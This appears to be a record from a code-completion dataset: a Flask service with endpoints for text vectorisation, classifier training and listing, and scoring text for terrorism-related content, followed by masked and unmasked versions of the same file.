data_audit={"auditEventType":"Start task","details":{"sento":"NLP analysis"},"principal":"Analyst"}
datajson=json.dumps(data_audit)
results_audit=audit(datajson)
#Send the response codes
responses = jsonify(probability=probability,concepts=analysis[0],key_ideas=analysis[1],topics=analysis[2])
responses.status_code = 200
return responses
@app.route('/classifier',methods=['POST'])
def make_classifier():
try:
#Load the data
data = request.get_json()
except Exception as e:
raise e
if data == {}:
return(bad_request("There is no data for the training"))
else:
#Get the text and the language
try:
lang = data['lang']
except:
try:
lang=detect_language(data['text'])
print(lang)
except:
responses=jsonify("Error in vectorize: language field is missing")
return responses
try:
annotated_data = data['annotated_data']
except:
responses=jsonify("Error in classifier: annotated data is missing")
return responses
try:
user_id=data['user_id']
except:
responses=jsonify("Error in classifier: user_id is missing")
return responses
try:
case_id=data['case_id']
except:
responses=jsonify("Error in classifier: case_id is missing")
return responses
try:
clas_name=data['clas_name']
except:
responses=jsonify("Error in classifier: classifier name is missing")
return responses
print(len(annotated_data))
if len(annotated_data) < 22:
responses=jsonify( "Training data set should have more than 10 samples per each class")
return responses
if lang not in ['en','es','ar','ro','fr']:
responses=jsonify("Language not available. Language must be in ['en','es','ar','ro','fr']")
return responses
#Train the new classifier
print("Training a new classifier from the user's annotated dataset ")
accuracy=classifier(annotated_data,lang,user_id,case_id,clas_name)
data_audit={"auditEventType":"Start task","details":{"classifier":"Trains a new classifier based on the annotations provided by the user"},"principal":"Analyst"}
datajson=json.dumps(data_audit)
results_audit=audit(datajson)
#Send the response codes
responses = jsonify(message="Classifier has been saved. Accuracy given in % - calculated using C-10V", accuracy=accuracy)
responses.status_code = 200
return responses
@app.route('/claslisting',methods=['POST'])
def make_claslisting():
user_id=None
case_id=None
try:
#Load the data
data = request.get_json()
except Exception as e:
raise e
if data == {}:
return(bad_request())
else:
try:
user_id=data['user_id']
except:
responses=jsonify(message="Error in classifiers listing: user_id is missing")
return responses
try:
case_id=data['case_id']
except:
responses=jsonify(message="Error in classifiers listing: case_id is missing")
return responses
available_classifiers=claslisting(user_id,case_id)
data_audit={"auditEventType":"Start task","details":{"claslisting":"Lists the available classifiers"},"principal":"Analyst"}
datajson=json.dumps(data_audit)
results_audit=audit(datajson)
#Send the response codes
responses = jsonify(available_classifiers=available_classifiers)
responses.status_code = 200
return responses
@app.route('/my400')
def bad_request(msg=''):
code = 400
if msg=='':
msg = 'Error'
return msg, code
if __name__ == '__main__':
#app.run()
app.run(host='0.0.0.0',port=5000)
|
normal
|
{
"blob_id": "b51e0ee80a2488197470627821204d1f74cd62a1",
"index": 5437,
"step-1": "<mask token>\n\n\[email protected]('/probability', methods=['POST'])\ndef make_probability():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in probability: text is missing')\n return responses\n try:\n cls = data['classifier']\n except:\n responses = jsonify('Error in probability: classifier is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print('Computing probability of having content related to ' + cls)\n probability = probability_terror(text, lang, cls)\n responses = jsonify(probability=probability)\n responses.status_code = 200\n return responses\n\n\[email protected]('/analyze', methods=['POST'])\ndef make_analyze():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in analyze: text is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(message=\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n filename = os.path.join(os.path.dirname(__file__),\n 'models-registry.json')\n registry = load_data(filename)\n analysis = analyze(text, lang, registry)\n responses = jsonify(concepts=analysis[0], key_ideas=analysis[1],\n topics=analysis[2])\n responses.status_code = 200\n return responses\n\n\[email protected]('/terms', methods=['POST'])\ndef make_terms():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n texts = data['dataset']\n print('Suggesting new terms for search...')\n terms = new_terms(texts)\n responses = jsonify(message='Suggested new terms for search: ',\n terms=list(terms))\n responses.status_code = 200\n return responses\n\n\[email protected]('/sento', methods=['POST'])\ndef make_sento():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in sento: text is missing')\n return responses\n try:\n cls = data['classifier']\n except:\n responses = jsonify('Error in sento: classifier is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print('Sento analysis')\n probability = probability_terror(text, lang, cls)\n print(probability)\n filename = os.path.join(os.path.dirname(__file__),\n 'models-registry.json')\n registry = load_data(filename)\n analysis = analyze(text, lang, registry)\n data_audit = {'auditEventType': 'Start task', 'details': {'sento':\n 'NLP analysis'}, 'principal': 'Analyst'}\n datajson = json.dumps(data_audit)\n results_audit = audit(datajson)\n responses = jsonify(probability=probability, concepts=analysis[0],\n key_ideas=analysis[1], topics=analysis[2])\n responses.status_code = 200\n return responses\n\n\[email protected]('/classifier', methods=['POST'])\ndef make_classifier():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request('There is no data for the training')\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n annotated_data = data['annotated_data']\n except:\n responses = jsonify(\n 'Error in classifier: annotated data is missing')\n return responses\n try:\n user_id = data['user_id']\n except:\n responses = jsonify('Error in classifier: user_id is missing')\n return responses\n try:\n case_id = data['case_id']\n except:\n responses = jsonify('Error in classifier: case_id is missing')\n return responses\n try:\n clas_name = data['clas_name']\n except:\n responses = jsonify(\n 'Error in classifier: classifier name is missing')\n return responses\n print(len(annotated_data))\n if len(annotated_data) < 22:\n responses = jsonify(\n 'Training data set should have more than 10 samples per each class'\n )\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print(\"Training a new classifier from the user's annotated dataset \")\n accuracy = classifier(annotated_data, lang, user_id, case_id, clas_name\n )\n data_audit = {'auditEventType': 'Start task', 'details': {\n 'classifier':\n 'Trains a new classifier based on the annotations provided by the user'\n }, 'principal': 'Analyst'}\n datajson = json.dumps(data_audit)\n results_audit = audit(datajson)\n responses = jsonify(message=\n 'Classifier has been saved. Accuracy given in % - calculated using C-10V'\n , accuracy=accuracy)\n responses.status_code = 200\n return responses\n\n\[email protected]('/claslisting', methods=['POST'])\ndef make_claslisting():\n user_id = None\n case_id = None\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n user_id = data['user_id']\n except:\n responses = jsonify(message=\n 'Error in classifiers listing: user_id is missing')\n return responses\n try:\n case_id = data['case_id']\n except:\n responses = jsonify(message=\n 'Error in classifiers listing: case_id is missing')\n return responses\n available_classifiers = claslisting(user_id, case_id)\n data_audit = {'auditEventType': 'Start task', 'details': {'claslisting':\n 'Lists the available classifiers'}, 'principal': 'Analyst'}\n datajson = json.dumps(data_audit)\n results_audit = audit(datajson)\n responses = jsonify(available_classifiers=available_classifiers)\n responses.status_code = 200\n return responses\n\n\[email protected]('/my400')\ndef bad_request(msg=''):\n code = 400\n if msg == '':\n msg = 'Error'\n return msg, code\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/vectorize', methods=['POST'])\ndef make_vectorize():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in vectorize: text is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print('Vectorize...')\n embeddings = Embeddings(emb_dict[lang])\n processed_text = preprocess(text)\n no_stpw_text = remove_stopwords(processed_text, lang)\n vectorized_tokens = to_vector_single_nonzeros(no_stpw_text,\n embeddings, len(no_stpw_text))\n if len(vectorized_tokens) > 0:\n vectorized_text = np.mean(vectorized_tokens, axis=0)\n else:\n vectorized_text = np.zeros((300,) * 1)\n print(vectorized_text)\n responses = jsonify(vector=vectorized_text.tolist())\n responses.status_code = 200\n return responses\n\n\[email protected]('/probability', methods=['POST'])\ndef make_probability():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in probability: text is missing')\n return responses\n try:\n cls = data['classifier']\n except:\n responses = jsonify('Error in probability: classifier is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print('Computing probability of having content related to ' + cls)\n probability = probability_terror(text, lang, cls)\n responses = jsonify(probability=probability)\n responses.status_code = 200\n return responses\n\n\[email protected]('/analyze', methods=['POST'])\ndef make_analyze():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in analyze: text is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(message=\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n filename = os.path.join(os.path.dirname(__file__),\n 'models-registry.json')\n registry = load_data(filename)\n analysis = analyze(text, lang, registry)\n responses = jsonify(concepts=analysis[0], key_ideas=analysis[1],\n topics=analysis[2])\n responses.status_code = 200\n return responses\n\n\[email protected]('/terms', methods=['POST'])\ndef make_terms():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n texts = data['dataset']\n print('Suggesting new terms for search...')\n terms = new_terms(texts)\n responses = jsonify(message='Suggested new terms for search: ',\n terms=list(terms))\n responses.status_code = 200\n return responses\n\n\[email protected]('/sento', methods=['POST'])\ndef make_sento():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in sento: text is missing')\n return responses\n try:\n cls = data['classifier']\n except:\n responses = jsonify('Error in sento: classifier is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print('Sento analysis')\n probability = probability_terror(text, lang, cls)\n print(probability)\n filename = os.path.join(os.path.dirname(__file__),\n 'models-registry.json')\n registry = load_data(filename)\n analysis = analyze(text, lang, registry)\n data_audit = {'auditEventType': 'Start task', 'details': {'sento':\n 'NLP analysis'}, 'principal': 'Analyst'}\n datajson = json.dumps(data_audit)\n results_audit = audit(datajson)\n responses = jsonify(probability=probability, concepts=analysis[0],\n key_ideas=analysis[1], topics=analysis[2])\n responses.status_code = 200\n return responses\n\n\[email protected]('/classifier', methods=['POST'])\ndef make_classifier():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request('There is no data for the training')\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n annotated_data = data['annotated_data']\n except:\n responses = jsonify(\n 'Error in classifier: annotated data is missing')\n return responses\n try:\n user_id = data['user_id']\n except:\n responses = jsonify('Error in classifier: user_id is missing')\n return responses\n try:\n case_id = data['case_id']\n except:\n responses = jsonify('Error in classifier: case_id is missing')\n return responses\n try:\n clas_name = data['clas_name']\n except:\n responses = jsonify(\n 'Error in classifier: classifier name is missing')\n return responses\n print(len(annotated_data))\n if len(annotated_data) < 22:\n responses = jsonify(\n 'Training data set should have more than 10 samples per each class'\n )\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print(\"Training a new classifier from the user's annotated dataset \")\n accuracy = classifier(annotated_data, lang, user_id, case_id, clas_name\n )\n data_audit = {'auditEventType': 'Start task', 'details': {\n 'classifier':\n 'Trains a new classifier based on the annotations provided by the user'\n }, 'principal': 'Analyst'}\n datajson = json.dumps(data_audit)\n results_audit = audit(datajson)\n responses = jsonify(message=\n 'Classifier has been saved. Accuracy given in % - calculated using C-10V'\n , accuracy=accuracy)\n responses.status_code = 200\n return responses\n\n\[email protected]('/claslisting', methods=['POST'])\ndef make_claslisting():\n user_id = None\n case_id = None\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n user_id = data['user_id']\n except:\n responses = jsonify(message=\n 'Error in classifiers listing: user_id is missing')\n return responses\n try:\n case_id = data['case_id']\n except:\n responses = jsonify(message=\n 'Error in classifiers listing: case_id is missing')\n return responses\n available_classifiers = claslisting(user_id, case_id)\n data_audit = {'auditEventType': 'Start task', 'details': {'claslisting':\n 'Lists the available classifiers'}, 'principal': 'Analyst'}\n datajson = json.dumps(data_audit)\n results_audit = audit(datajson)\n responses = jsonify(available_classifiers=available_classifiers)\n responses.status_code = 200\n return responses\n\n\[email protected]('/my400')\ndef bad_request(msg=''):\n code = 400\n if msg == '':\n msg = 'Error'\n return msg, code\n\n\n<mask token>\n",
"step-3": "<mask token>\napp = Flask(__name__)\nemb_dict = {'en': 'embedding-EN', 'ar': 'embedding-AR', 'es':\n 'embedding-ES', 'ro': 'embedding-RO', 'fr': 'embedding-FR'}\n\n\[email protected]('/vectorize', methods=['POST'])\ndef make_vectorize():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in vectorize: text is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print('Vectorize...')\n embeddings = Embeddings(emb_dict[lang])\n processed_text = preprocess(text)\n no_stpw_text = remove_stopwords(processed_text, lang)\n vectorized_tokens = to_vector_single_nonzeros(no_stpw_text,\n embeddings, len(no_stpw_text))\n if len(vectorized_tokens) > 0:\n vectorized_text = np.mean(vectorized_tokens, axis=0)\n else:\n vectorized_text = np.zeros((300,) * 1)\n print(vectorized_text)\n responses = jsonify(vector=vectorized_text.tolist())\n responses.status_code = 200\n return responses\n\n\[email protected]('/probability', methods=['POST'])\ndef make_probability():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in probability: text is missing')\n return responses\n try:\n cls = data['classifier']\n except:\n responses = jsonify('Error in probability: classifier is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print('Computing probability of having content related to ' + cls)\n probability = probability_terror(text, lang, cls)\n responses = jsonify(probability=probability)\n responses.status_code = 200\n return responses\n\n\[email protected]('/analyze', methods=['POST'])\ndef make_analyze():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in analyze: text is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(message=\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n filename = os.path.join(os.path.dirname(__file__),\n 'models-registry.json')\n registry = load_data(filename)\n analysis = analyze(text, lang, registry)\n responses = jsonify(concepts=analysis[0], key_ideas=analysis[1],\n topics=analysis[2])\n responses.status_code = 200\n return responses\n\n\[email protected]('/terms', methods=['POST'])\ndef make_terms():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n texts = data['dataset']\n print('Suggesting new terms for search...')\n terms = new_terms(texts)\n responses = jsonify(message='Suggested new terms for search: ',\n terms=list(terms))\n responses.status_code = 200\n return responses\n\n\[email protected]('/sento', methods=['POST'])\ndef make_sento():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in sento: text is missing')\n return responses\n try:\n cls = data['classifier']\n except:\n responses = jsonify('Error in sento: classifier is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print('Sento analysis')\n probability = probability_terror(text, lang, cls)\n print(probability)\n filename = os.path.join(os.path.dirname(__file__),\n 'models-registry.json')\n registry = load_data(filename)\n analysis = analyze(text, lang, registry)\n data_audit = {'auditEventType': 'Start task', 'details': {'sento':\n 'NLP analysis'}, 'principal': 'Analyst'}\n datajson = json.dumps(data_audit)\n results_audit = audit(datajson)\n responses = jsonify(probability=probability, concepts=analysis[0],\n key_ideas=analysis[1], topics=analysis[2])\n responses.status_code = 200\n return responses\n\n\[email protected]('/classifier', methods=['POST'])\ndef make_classifier():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request('There is no data for the training')\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n annotated_data = data['annotated_data']\n except:\n responses = jsonify(\n 'Error in classifier: annotated data is missing')\n return responses\n try:\n user_id = data['user_id']\n except:\n responses = jsonify('Error in classifier: user_id is missing')\n return responses\n try:\n case_id = data['case_id']\n except:\n responses = jsonify('Error in classifier: case_id is missing')\n return responses\n try:\n clas_name = data['clas_name']\n except:\n responses = jsonify(\n 'Error in classifier: classifier name is missing')\n return responses\n print(len(annotated_data))\n if len(annotated_data) < 22:\n responses = jsonify(\n 'Training data set should have more than 10 samples per each class'\n )\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print(\"Training a new classifier from the user's annotated dataset \")\n accuracy = classifier(annotated_data, lang, user_id, case_id, clas_name\n )\n data_audit = {'auditEventType': 'Start task', 'details': {\n 'classifier':\n 'Trains a new classifier based on the annotations provided by the user'\n }, 'principal': 'Analyst'}\n datajson = json.dumps(data_audit)\n results_audit = audit(datajson)\n responses = jsonify(message=\n 'Classifier has been saved. Accuracy given in % - calculated using C-10V'\n , accuracy=accuracy)\n responses.status_code = 200\n return responses\n\n\[email protected]('/claslisting', methods=['POST'])\ndef make_claslisting():\n user_id = None\n case_id = None\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n user_id = data['user_id']\n except:\n responses = jsonify(message=\n 'Error in classifiers listing: user_id is missing')\n return responses\n try:\n case_id = data['case_id']\n except:\n responses = jsonify(message=\n 'Error in classifiers listing: case_id is missing')\n return responses\n available_classifiers = claslisting(user_id, case_id)\n data_audit = {'auditEventType': 'Start task', 'details': {'claslisting':\n 'Lists the available classifiers'}, 'principal': 'Analyst'}\n datajson = json.dumps(data_audit)\n results_audit = audit(datajson)\n responses = jsonify(available_classifiers=available_classifiers)\n responses.status_code = 200\n return responses\n\n\[email protected]('/my400')\ndef bad_request(msg=''):\n code = 400\n if msg == '':\n msg = 'Error'\n return msg, code\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000)\n",
"step-4": "import pandas as pd\nimport pickle\nfrom flask import Flask, render_template, request, jsonify\nfrom utilities import load_data, detect_language\nfrom preprocessing import preprocess, Tagger, remove_stopwords\nimport json\nfrom gensim.models import KeyedVectors\nfrom Embeddings import Embeddings, to_vector_single, to_vector_single_nonzeros\nimport numpy as np\nimport os\nfrom analysis import analyze\nfrom probability_terror import probability_terror\nfrom new_terms_no_lang import new_terms\nfrom classifier import classifier\nfrom claslisting import claslisting\nfrom audit import audit\napp = Flask(__name__)\nemb_dict = {'en': 'embedding-EN', 'ar': 'embedding-AR', 'es':\n 'embedding-ES', 'ro': 'embedding-RO', 'fr': 'embedding-FR'}\n\n\[email protected]('/vectorize', methods=['POST'])\ndef make_vectorize():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in vectorize: text is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print('Vectorize...')\n embeddings = Embeddings(emb_dict[lang])\n processed_text = preprocess(text)\n no_stpw_text = remove_stopwords(processed_text, lang)\n vectorized_tokens = to_vector_single_nonzeros(no_stpw_text,\n embeddings, len(no_stpw_text))\n if len(vectorized_tokens) > 0:\n vectorized_text = np.mean(vectorized_tokens, axis=0)\n else:\n vectorized_text = np.zeros((300,) * 1)\n print(vectorized_text)\n responses = jsonify(vector=vectorized_text.tolist())\n responses.status_code = 200\n return responses\n\n\[email protected]('/probability', methods=['POST'])\ndef make_probability():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in probability: text is missing')\n return responses\n try:\n cls = data['classifier']\n except:\n responses = jsonify('Error in probability: classifier is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print('Computing probability of having content related to ' + cls)\n probability = probability_terror(text, lang, cls)\n responses = jsonify(probability=probability)\n responses.status_code = 200\n return responses\n\n\[email protected]('/analyze', methods=['POST'])\ndef make_analyze():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in analyze: text is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(message=\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n filename = os.path.join(os.path.dirname(__file__),\n 'models-registry.json')\n registry = load_data(filename)\n analysis = analyze(text, lang, registry)\n responses = jsonify(concepts=analysis[0], key_ideas=analysis[1],\n topics=analysis[2])\n responses.status_code = 200\n return responses\n\n\[email protected]('/terms', methods=['POST'])\ndef make_terms():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n texts = data['dataset']\n print('Suggesting new terms for search...')\n terms = new_terms(texts)\n responses = jsonify(message='Suggested new terms for search: ',\n terms=list(terms))\n responses.status_code = 200\n return responses\n\n\[email protected]('/sento', methods=['POST'])\ndef make_sento():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in sento: text is missing')\n return responses\n try:\n cls = data['classifier']\n except:\n responses = jsonify('Error in sento: classifier is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print('Sento analysis')\n probability = probability_terror(text, lang, cls)\n print(probability)\n filename = os.path.join(os.path.dirname(__file__),\n 'models-registry.json')\n registry = load_data(filename)\n analysis = analyze(text, lang, registry)\n data_audit = {'auditEventType': 'Start task', 'details': {'sento':\n 'NLP analysis'}, 'principal': 'Analyst'}\n datajson = json.dumps(data_audit)\n results_audit = audit(datajson)\n responses = jsonify(probability=probability, concepts=analysis[0],\n key_ideas=analysis[1], topics=analysis[2])\n responses.status_code = 200\n return responses\n\n\[email protected]('/classifier', methods=['POST'])\ndef make_classifier():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request('There is no data for the training')\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n annotated_data = data['annotated_data']\n except:\n responses = jsonify(\n 'Error in classifier: annotated data is missing')\n return responses\n try:\n user_id = data['user_id']\n except:\n responses = jsonify('Error in classifier: user_id is missing')\n return responses\n try:\n case_id = data['case_id']\n except:\n responses = jsonify('Error in classifier: case_id is missing')\n return responses\n try:\n clas_name = data['clas_name']\n except:\n responses = jsonify(\n 'Error in classifier: classifier name is missing')\n return responses\n print(len(annotated_data))\n if len(annotated_data) < 22:\n responses = jsonify(\n 'Training data set should have more than 10 samples per each class'\n )\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print(\"Training a new classifier from the user's annotated dataset \")\n accuracy = classifier(annotated_data, lang, user_id, case_id, clas_name\n )\n data_audit = {'auditEventType': 'Start task', 'details': {\n 'classifier':\n 'Trains a new classifier based on the annotations provided by the user'\n }, 'principal': 'Analyst'}\n datajson = json.dumps(data_audit)\n results_audit = audit(datajson)\n responses = jsonify(message=\n 'Classifier has been saved. Accuracy given in % - calculated using C-10V'\n , accuracy=accuracy)\n responses.status_code = 200\n return responses\n\n\[email protected]('/claslisting', methods=['POST'])\ndef make_claslisting():\n user_id = None\n case_id = None\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n user_id = data['user_id']\n except:\n responses = jsonify(message=\n 'Error in classifiers listing: user_id is missing')\n return responses\n try:\n case_id = data['case_id']\n except:\n responses = jsonify(message=\n 'Error in classifiers listing: case_id is missing')\n return responses\n available_classifiers = claslisting(user_id, case_id)\n data_audit = {'auditEventType': 'Start task', 'details': {'claslisting':\n 'Lists the available classifiers'}, 'principal': 'Analyst'}\n datajson = json.dumps(data_audit)\n results_audit = audit(datajson)\n responses = jsonify(available_classifiers=available_classifiers)\n responses.status_code = 200\n return responses\n\n\[email protected]('/my400')\ndef bad_request(msg=''):\n code = 400\n if msg == '':\n msg = 'Error'\n return msg, code\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000)\n",
